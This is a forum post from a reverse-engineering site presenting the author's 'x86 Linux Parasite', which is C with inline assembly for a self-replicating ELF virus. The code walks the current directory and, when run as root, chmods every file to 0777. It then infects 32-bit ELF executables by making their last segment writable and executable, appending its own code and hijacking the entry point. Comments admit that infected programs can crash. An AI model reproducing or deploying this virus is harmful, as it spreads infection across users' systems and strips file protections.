Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

x86 Linux Parasite

JMC31337
JMC31337
in Malware Reverse Engineering

Featured Replies

Posted 
//./gcc -m32 -masm=intel -o file file.c
//https://www.cs.bgu.ac.il/~caspl152/wiki.files/ps05_152.pdf\
//One-oh-one on Linux Virii written by herm1t (x) VxHeavens.com, June 2010

//Since Ive now written a parasite in both x86 formats (Win & Lin)
//Things need to be said about this knowledge and power
//When I 1st began writing viruses (or virii for all those correctedness types
//I strove to be as a good as 29A - still i fall short of such titles
//I owe my mentor herm1t  (and other VXRs) a ton of respect
//for putting up with my constant annoyances of every line and piece of new code
//added - thanks herm1t for not holding my hand (in facf youre tutorial insists upon
//c-coding one (why use ASM? more of a challenge, and i save c-code VXng for
//rootkits.) Lulz and thanks to everyone else out there who (because I am bad for
//reputational marketing images) i wont know, but thanks for
//putting up with me, and, my prior VX codes that were not so good (which ill fix up in time)
//The VX scene isnt dead, though the VXR is not looked at too kindly these days
//contrary to those of old days, now that cybermalware has reached the apex of
//causing billions of $$ worth of problems to govt's and systems of the world yearly
//We true VXR who only set out to show knowledge can never condone ruining another
//system but its what you set out to do with this knowledge that makes you
//
//This thing isnt perfect. My itr82 jump is faulty (so no files to infect causes problems.)
//I was going to fix it, until I realized after testing it against 3 hello-world GTK
//and 3 hello-world c-codes that so long as the parasite can eat and live, all programs
//will work fine post-infection. If the parasite has a host the parasite lives on, and so 
//hopefully, with a proper Commensalism relationships in place, so does the host.
//No files to infect, and the infected host seg-faults and dies turning it into
//a Parasitism relationship - but feed it some progs and alive it is again
//This parasite only adds its replicator code, it does no true damage (unless i messed up)
//--"The Lord will even dwell within the darkness" Solomon 1 Kings 8:12

asm(".intel_syntax noprefix\n");

void main()
{
asm(
	
	"_code:\n"
	"call _start\n"
	"_start:\n"
	"pushad\n"
	
//=======================================================================
//GRAB DIRECTORY ENTRIES
//USE STACK SPACE FOR NOW
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

//		        eax 	        ebx 	                        ecx                                                   edx 	                        esi 	edi
//sys_getdents	0x8d	unsigned int fd	struct linux_dirent __user *dirent	unsigned int count	  -	   -	
	
	"_getdents:\n"
	"push 0x2e\n" //push "." to stack
	"mov ebx,esp\n" //load the reg with it
	"xor ecx,ecx\n" //set option to R_ONLY
	"mov edx,0x400\n" //READ_ONLY
	"mov eax,0x05\n" //call open dir
	"int 0x80\n"
	
	"sub esp,0x500000\n"
	"mov ebx,eax\n"
	"mov eax,0x8d\n" //getdents
	"mov ecx,esp\n" //store to stack
	"mov edx,0x500000\n" //len of reserved space for getdents info
	"int 0x80\n"  //[esp-0x500000] = getdents stuff
	
//=======================================================================
// GOT ROOT?
//IF SO CHMOD ALL FILES
//			eax 	      ebx   ecx   edx   esi   edi
//sys_getuid	0xc7	-	-	-	-	-

"mov eax,0xc7\n"
"int 0x80\n"
"cmp eax,0x00\n" // ROOT=0x00
"jne _root_chmod_skip\n"


//===================================================
//WE GOT ROOT CHMOD RWE ALL FILES 0x777
//ESP = getdents struct
//			eax 	 ebx 	                                ecx 			edx 	esi 	edi
//sys_chmod	0x0f	 const char __user *filename	mode_t mode     -       -       -
	
	"_root_chmod:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	
	//EBP=GETDENTS
	//=====================================
	"xor edi,edi\n"
	"_iter8:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx-1],0x00\n"
	"je _root_chmod_skip\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//=====================================
	"_ffound:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n"
	"push ebx\n"
	"mov ebx,ecx\n"  //ebx & ecx=fname
	"mov eax,0x0f\n" //CHMOD
	"mov ecx,0x1ff\n" //RWE ALL USERS
	"int 0x80\n"  //call
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//===================================
	
//=================================================
//CONTINUE WITH
//PRIVS WE HAVE AND HOPE
//FOR THE BEST
//=================================================


	"_root_chmod_skip:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	"xor edi,edi\n"
	"_iter82:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx],0x00\n"   //<--------------****safety loop****
	"je _code_end\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound2\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//=====================================
	"_ffound2:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n" //ECX=FNAME
	"push ebx\n"  
	
	"jmp _stat\n"
	"_stat_ret:\n"
	
	
//AT THIS POINT
//[EDI]=HEAP START
//[EBP]=GETDETNS INFO
//[ESI]=FSIZE
//[ESP]= ->GETDENTS.FNAME@0x0A

	"jmp _fopen\n"
	"_fopen_ret:\n"
	"jmp _fread\n"
	"_fread_ret:\n"
	"jmp _is_elf\n"
	"_is_elf_ret:\n"
	
	//infect ELF heap
	//write ELF heap to file
	//close 
	
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//===================================
 
//===========================================
//IS IT AN ELF FILE?
"_is_elf:\n"

"cmp dword ptr[edi],0x464c457f\n"  //.FLE
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x04],0x01\n" //x86 file?
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x05],0x01\n" //LSB?
"jne _is_elf_ret\n"

"xor eax,eax\n"
"mov al,byte ptr[edi+0x28]\n"
"xor ecx,ecx\n"
"mov cx,word ptr[edi+0x2a]\n"
"xor edx,edx\n"
"mov dx,word ptr[edi+0x2c]\n"

"add eax,edi\n"

"_hdr_iter8:\n"
"cmp dword ptr[eax],0x01\n"
"je _hdr_mod\n"
"cmp dword ptr[eax],0x07\n"
"ja _is_elf_ret\n"

"_itr8_rep:\n"
"add eax,ecx\n"
"jmp _hdr_iter8\n"

"_hdr_mod:\n"
//[eax]=P_hdr_start
"cmp [eax+0x08],esi\n"
"jb _itr8_rep\n" 

"mov ecx,[eax+0x1c]\n" //ecx=seg_align
"add ecx,ecx\n"
"mov edx,[eax+0x14]\n"
"add edx,ecx\n"
"or edx,0x0fff\n"
"xor edx,0xfff\n" //edx=align*2    +  p_fsize| ||  
"mov [eax+0x14],edx\n"
"mov [eax+0x10],edx\n" //file_heap_fsize & memsize incr
"mov edx,0x00000007\n"
"mov [eax+0x18],edx\n" //last seg is RWE



//lets store the orig_ep into an unreserved header location
//and head to EOF
"mov ecx,edi\n"
"mov edx,[ecx+0x18]\n" //edx=orig EP
"mov [ecx+0x0c],edx\n"  //@file_heap[elf_hdr+0x0c]=host orig_ep
"mov ecx,edi\n"
"add ecx,esi\n"

//=========================================
//WE ADJUSTED THE LAST LOAD SEGMENT
//WE ADDED 0x1000 2 HEAP WHEN ALLOCATED
//NOW ADD IN SHELL+PARASITIC CODE
"pushad\n"  //save reg state
"call _delta\n"
"_delta:\n"

"mov edi,ecx\n"
"pop esi\n" //esi should have code start loc.
"sub esi,0x124\n"
"mov ecx,0x280\n" //# of bytes
"rep movsb\n"

//=========================================

//NOTE: change Orig_ep ->shell

"mov ecx,[esp]\n" //ecx=ELF in heap
"add ecx,0x18\n"
//edi = eof+para_end

//get current base
"call _delta2\n"
"_delta2:\n"
"pop ecx\n"
"or ecx,0xfff\n"
"xor ecx,0xfff\n"

//eax = heap file_last_seg
//ecx = orig host ep seg 
//edx = orig host ep value
//esi = orig host ep seg 0xfff
//edi = heap file eof
//esp = heaped file
//[esp+0x04] = fsize host
//edi-0x200 = host eof parasite start
//[esp+0x1c] = ptr -> last seg 
//get last seg align
//calc va of parasite and write it into host ep
//calc host orig ep and write opcode jump to it
//get parasite start location -> EOF_host

//write "X" infected
//add cmp to detect eof "x"

"mov ebx,edi\n"
"sub ebx,0x200\n"
"push ebx\n"
"mov ebx,eax\n"
"add ebx,0x1c\n"
"mov ebx,[ebx]\n"
"add [esp],ebx\n"
"pop ebx\n"
"push edx\n"
"mov edx,[esp+0x04]\n"
"add edx,0x18\n"
"or ebx,0xffff0000\n"
"xor ebx,0xffff0000\n"

"mov ecx,eax\n"
"add ecx,0x1c\n"
"mov ecx,[ecx]\n"
"mov ebx,[esp+0x08]\n"
"add ebx,ecx\n"
"mov [edx],ebx\n" //hello == 4cac
"pop edx\n"


//============================================================
//			eax 		ebx 				ecx 					edx 			esi 	edi
//sys_write	0x04	unsigned int fd	const char __user *buf	size_t count	-	-
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

"mov eax,0x05\n"
"mov ebx,[esp+0x20]\n"
"add ebx,0x0a\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"
"mov ebx,eax\n"
"mov eax,0x04\n"
"mov ecx,[esp]\n"
"mov edx,[esp+0x04]\n"
"add edx,0x1000\n"
"int 0x80\n"
//============================================================









"popad\n" //restore reg state
"jmp _code_end\n" //DEBUG******** 1-file COMMENT****** all-files

"jmp _is_elf_ret\n"
//===========================================


//==================================================
//		  eax        ebx 	                         ecx 	                         edx 	esi 	edi
//sys_read	  0x03   unsigned int fd	char __user *buf	size_t count	  -	   -
"_fread:\n"

"mov ebx,eax\n"
"mov eax,0x03\n"
"mov ecx,edi\n"
"mov edx,esi\n"
"int 0x80\n"

"jmp _fread_ret\n"
//===================================================
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	
"_fopen:\n"

"mov ebx,[esp]\n"
"add ebx,0x0a\n"
"mov eax,0x05\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"

"cmp eax,0x00\n"
"jge _fopen_ret\n"

"pop ebx\n"
"pop ecx\n"
"mov ebx,ecx\n"
"jmp _iter82\n"
	



//"jmp _fopen_ret\n"

//=============================================
//		        eax 		ebx 					ecx 						edx 	esi 	edi													
//sys_newstat	0x6a	char __user *filename	struct stat __user *statbuf	  -	  -	  -
"_stat:\n"
"sub esp,0x100\n"
"mov eax,0x6a\n"
"mov ebx,ecx\n"
"mov ecx,esp\n"
"int 0x80\n"
//[ecx+0x14]=fsize

	//=====================================
	"_heap_alloc:\n"
	"mov eax,0x2d\n"
	"mov ebx,edi\n"
	"int 0x80\n"
	"mov ebx,eax\n"
	"add ebx,[ecx+0x14]\n" //fix
	"add ebx,0x00001000\n"  //fsize+virus_size****************
	"mov eax,0x2d\n"
	"int 0x80\n"
	"sub eax,[ecx+0x14]\n" //fix
	"sub eax,0x00001000\n" //fsize+virus_size*****************
	//========================
	//CHANGE HEAP TO RWE PRIVS
	"mov edx,0x07\n"
	"mov ebx,eax\n"
	"mov eax,0x7d\n"
	"int 0x80\n"
	//EBX = HEAP ADDRESS RWE
	//========================
	"mov edi,ebx\n"   //EDI=HEAP START
	"mov esi,[esp+0x14]\n"  //ESI=FSIZE
	"add esp,0x100\n"
 	
"jmp _stat_ret\n"


"nop\n"
"nop\n"

//==============================================



//NOTE:JMP TO ORIG HOST EP	
	
	"_code_end:\n"
	"add esp,0x500000\n" //return our stack to its orig state
	
	"add esp,0xc\n"
	"popad\n"
	"pop ecx\n"
	
	"mov edi,[eax]\n"
	"mov ecx,edi\n"
	"add ecx,0x0c\n"
	"add edi,[ecx]\n"
	"xor ecx,ecx\n"
	"jmp edi\n"
	




//================================================
//================================================
//================================================
	
	
	"mov eax,0x01\n"
	"int 0x80\n"
	"nop\n"
	"nop\n"
	"nop\n"
	);
}

 

    • Like 1

    Create an account or sign in to comment

    Go to topic listing

    Configure browser push notifications
    Chrome (Android)
    1. Tap the lock icon next to the address bar.
    2. Tap Permissions → Notifications.
    3. Adjust your preference.
    Chrome (Desktop)
    1. Click the padlock icon in the address bar.
    2. Select Site settings.
    3. Find Notifications and adjust your preference.